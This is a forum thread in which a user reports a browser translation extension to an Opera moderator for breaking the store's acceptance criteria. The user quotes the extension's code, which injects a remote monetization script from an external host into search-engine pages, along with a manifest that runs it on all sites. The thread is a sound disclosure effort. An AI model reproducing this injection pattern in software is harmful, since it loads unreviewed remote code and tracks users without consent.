Report extension
-
leocg Moderator Volunteer last edited by
https://dev.opera.com/extensions/publishing-guidelines/#acceptance-criteria
There you will find the criteria for an extension to be accepted. Of course stealing passwords is not allowed.
And Opera is probably the browser that more takes users's security into consideration, making some of them even complain about the excess of security sometimes.
-
A Former User last edited by A Former User
@leocg said in Report extension:
And Opera is probably the browser that more takes users's security into consideration, making some of them even complain about the excess of security sometimes.
If that is really the case, you should probably have an easy way to report extensions that doesn't behave, right? And from the impression you are giving me, It doesn't really sound like your statement is true, seeing that from the link you posted, at least 5 criteria were broken, and still you are treating me with disbelief
️It must not collect private information without authorization from the user.
The extension does not ask for consent in any way and still loads monetizus, which, as I said earlier, is a monetization service included on the extension. From the service webpage, here are some of those features, which tracks the user:
- In-image: Monetize the most viewed and beloved content. Monetizus solution parses images by pixel to determine what’s in every image and drive relevant promotional materials to your audience.
- Price Suggestor: [...] Fast and relevant search through the tons of products collects and drives the fairest results with the cheapest prices, depending on your user's activity.
- Interstitial: [...] Monetize the time, users spend on the website with Monetizus.
And, well, it is a monetization service, so there's probably more tracking under the hood...
It must not change referral parameters, interfere with Opera monetization mechanisms or otherwise misappropriate traffic or revenues from other sources.
It could misappropriate traffic or revenues from other sources using some of the features of the same service said above. All of the services provided by Monetizus goes against this topic, and you can check them here. I'm not saying that the extension uses all of them, but the script that is loaded on the extension definitely has all those capabilities, and it is up to the Monetizus service to really decide if they will or not apply those services.
No external JavaScript is allowed. All JavaScript code must be contained in the extension. External APIs are ok.
As I said in the first post, the extension has the following code on the
includes/user_js.jsfile:if (window.location.href.match(/[a-z]+:\/\/(www\.)?(bing|google|yandex|baidu|search\.yahoo|duckduckgo|qwant|nova\.rambler|youtube)\.[a-z]+(\/|$)/i)) { console.log("demo mode: include monetizus plugin."); var monetizer_script = document.createElement("SCRIPT"); monetizer_script.src = "//s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.js"; var firstScript = document.getElementsByTagName("SCRIPT")[0]; firstScript.parentNode.insertBefore(monetizer_script, firstScript); }I don't know if you understand this code, but it is essentially inserting the script
s3.amazonaws.com/cashe-js/1c31e14cd0e143b215.jsif the URL contains one of the following words, it injects the monetizus script: bing, google, yandex, baidu, search, yahoo, duckduckgo, qwant, nova, rambler, youtube. The code is delivered through an online address, so if monetizus decides to change the content of this script to do exactly what I said on the last post (secretly steal your passwords from facebook, google, etc), they could easily do it at any time, and you wouldn't even notice... I should probably state too that the URLs3.amazonaws.com/cashe-js/1c31e14cd0e143b215.jsIs reported by my antivirus (Kaspersky) as a dangerous URL.Ads in content scripts are not allowed.
As I said, the monetizus script is loaded on the
includes/user_js.jsfile, and as you can see on the manifest, it is included on thecontent_scriptssection:"content_scripts": [ { "all_frames": true, "js": [ "includes/user_js.js" ], "matches": [ "*://*/*" ], "run_at": "document_end" } ],While linking to your own or other sites from your extension is fine, such links should be relevant and have a clear function. Don’t overload the extension with promotional links.
A monetization/tracking service is definitely not relevant to the user of the extension, especially when being secretly bundled with a translating extension.
So, again, can you please stop treating me with disbelief and offer some help? That is really annoying, as I'm trying to report a security issue to make Opera better, and those actions only discourage people from doing it...
-
-
-
-
A Former User last edited by
@leocg Well, can't you do something about it? Or at least pass that to someone who can?
-
-
-
-
A Former User last edited by
@leocg Nice! Thanks!
I just wished this whole process could be less tiresome and time-consuming on my end you know, because I'm not the only one who should be looking for security issues like that, and with all the trouble I had to go through to just make a simple and obvious report, I think it just discourages people to do the same.
I don't know how and when Opera checks for issues on extensions that are submitted or updated, but I expected that at least the acceptance criteria would be thoroughly checked, which, as I see with that extension, was not the case at all. This issue gets amplified seeing the reach of that extension, which is on the top 10 recommended extensions and is first one on the translation category. How an extension like this gets recommended by your team?
Along with that, an easier way to report an extension, which would not require me to dissect the extension source code and your acceptance criteria to look for issues would definitely be great...
-
leocg Moderator Volunteer last edited by
Next time you can use https://security.opera.com/report-security-issue/
Choose web services and then addons.opera.com
